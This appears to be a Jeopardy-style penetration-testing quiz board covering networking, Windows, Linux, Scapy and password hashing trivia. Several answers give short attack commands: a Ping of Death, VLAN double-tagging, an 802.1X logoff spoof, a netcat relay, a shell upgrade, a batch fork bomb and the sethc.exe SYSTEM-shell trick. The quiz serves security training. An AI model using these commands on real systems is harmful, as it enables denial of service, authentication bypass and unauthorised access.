Network
Windows
Linux
Python/Scapy
Password
100
A remote code execution vulnerability described by CVE-2008-4250 and patched by Microsoft on Thursday, October 23.
What is MS08-067?
100
NEGOTIATE_TYPE_MESSAGE, CHALLENGE_TYPE_MESSAGE, AUTHENTICATE_TYPE_MESSAGE
What are the 3 messages used in the NTLM challenge-response authentication protocol?
100
The number of the interrupt signal (SIGINT) that can be sent with CTRL-C.
What is the signal number 2?
100
$> ncat 10.0.0.1 1337
uname
Linux
python -c 'import pty; pty.spawn("/bin/sh")'
From terminal access, how can you get shell access with python?
100
$TheMasterPassword%%
What was Daniel's password?
200
The four (4) Nmap features activated by the -A parameter. (3 out of 4 are asked)
What are OS detection, version detection, script scanning and traceroute?
200
A penetration tester can modify this Windows executable to get SYSTEM shell access on non-encrypted computers without knowing or modifying any Windows account.
What is C:\Windows\System32\sethc.exe useful for?
200
$> mknod backpipe p
$> nc -l -p [LocalPort] 0<backpipe | nc [TargetHost] [TargetPort] 1>backpipe
How do you do a netcat relay?
200
for p in fragment(IP(dst="10.10.10.3")/ICMP()/("X"*60000)): send(p)
How can you send a Ping of Death to 10.10.10.3?
200
aad3b435b51404eeaad3b435b51404ee
What is the LM Hash of an empty string?
300
This URL is used by clients of the Web Proxy Auto-Discovery Protocol (using NetBIOS name resolution) to download the configuration file and determine the proxy for a given URL.
What is the URL http://wpad/wpad.dat?

Example of a wpad.dat file (a PAC script; the string quotes lost in extraction are restored here):

$ cat wpad.dat
function FindProxyForURL(url, host) {
  if (isInNet(host, "192.168.0.0", "255.255.0.0")) {
    return "DIRECT";
  } else {
    if (shExpMatch(url, "http:*")) return "PROXY 192.168.0.250:3128";
    if (shExpMatch(url, "https:*")) return "PROXY 192.168.0.250:3128";
    if (shExpMatch(url, "ftp:*")) return "PROXY 192.168.0.250:3128";
    return "DIRECT";
  }
}
300
sekurlsa
What is the LSASS hash dumping module in Mimikatz?
300
iptables -t nat -I POSTROUTING -o eth0 -p tcp --sport 1234 --dport 25 -j SNAT --to 10.10.10.3
What is the iptables command to spoof the source IP address as 10.10.10.3 for TCP connections with source port 1234 and destination port 25?
300
sendp(Ether()/Dot1Q(vlan=2)/Dot1Q(vlan=10)/IP(dst=target)/ICMP())
How can you jump from VLAN 2 to VLAN 10 (double tagging) and send an ICMP packet?
300
The "$1" field in the second part of this colon-delimited string identifies this algorithm. ibrahim:$1$hanhd/cF$3lzrzB14HceT7uc3oTmog1:14323:0:99999:7:::
How is the MD5 hash algorithm identified in the string above?

---------------------------------------------------------------------
"Hash_Codes Table"
---------------------------------------------------------------------
CODE  ALGORITHM   NOTES / DISCUSSION
1     md5         MD5 is not recommended due to the ease with which rainbow tables can be created to crack a file.
2     blowfish    Not NIST-approved, but very secure when used with multiple rounds.
2a    blowfish    Not NIST-approved, but very secure when used with multiple rounds.
3     [UNKNOWN]
4     [UNKNOWN]
5     sha256
6     sha512      Used by ubuntu 10.10 "Natty"
---------------------------------------------------------------------
400
shikata_ga_nai
What is the most popular Metasploit encoder, the only one ranked as excellent and described as "Polymorphic XOR Additive Feedback Encoder"?
400
This algorithm is computed as follows:
1- Convert the password to Unicode (little endian)
2- Compute the MD4 hash of the Unicode text
What is the NT hash algorithm?
400
This command is used to identify listening sockets as well as established connections, without converting port numbers to port names, on both Mac and Linux.
What is 'lsof -Pi' used for?
400
This encryption algorithm can be implemented as below (Python 3; the original used Python 2's izip and ord on str, so it needed its itertools imports and here takes data and key as bytes):

from itertools import cycle

def f(data, key):
    # XOR each byte of data with the repeating key stream (key is cycled to data's length)
    return bytearray(x ^ y for (x, y) in zip(data, cycle(key)))
How can you implement the XOR encryption algorithm?
400
This protocol is used by devices exploiting the DMA attack to bypass Windows Logon.
What is Serial Bus Protocol 2 (SBP-2)?
500
The following setting allows THIS Metasploit module to connect to a Windows machine in THIS specific context:

Local Security Policy > Security Settings > Local Policies > Security Options > Network Access: Sharing and security model for local accounts: Classic - local users authenticate as themselves
What setting do you need to modify in order to connect with PsExec (exploit/windows/smb/psexec) on a machine connected to a WORKGROUP instead of a DOMAIN?
500
C:\$ type attack.bat
:s
start %0
goto s

Compressed version: %0|%0
How is a fork bomb written in the Microsoft Windows batch scripting language?
500
vmsplice()
What is the Linux system call used for the local root exploit of kernel 2.6.17 to 2.6.24.1?
500
sendp(Ether(src="AA:BB:CC:DD:EE:FF")/EAPOL(type="logoff"))
How can you break 802.1X (dot1x) authentication of the computer with MAC address AA:BB:CC:DD:EE:FF?
500
KGS!@#$%
What is the preset ASCII string encrypted by the two DES keys used in the LM Hash algorithm?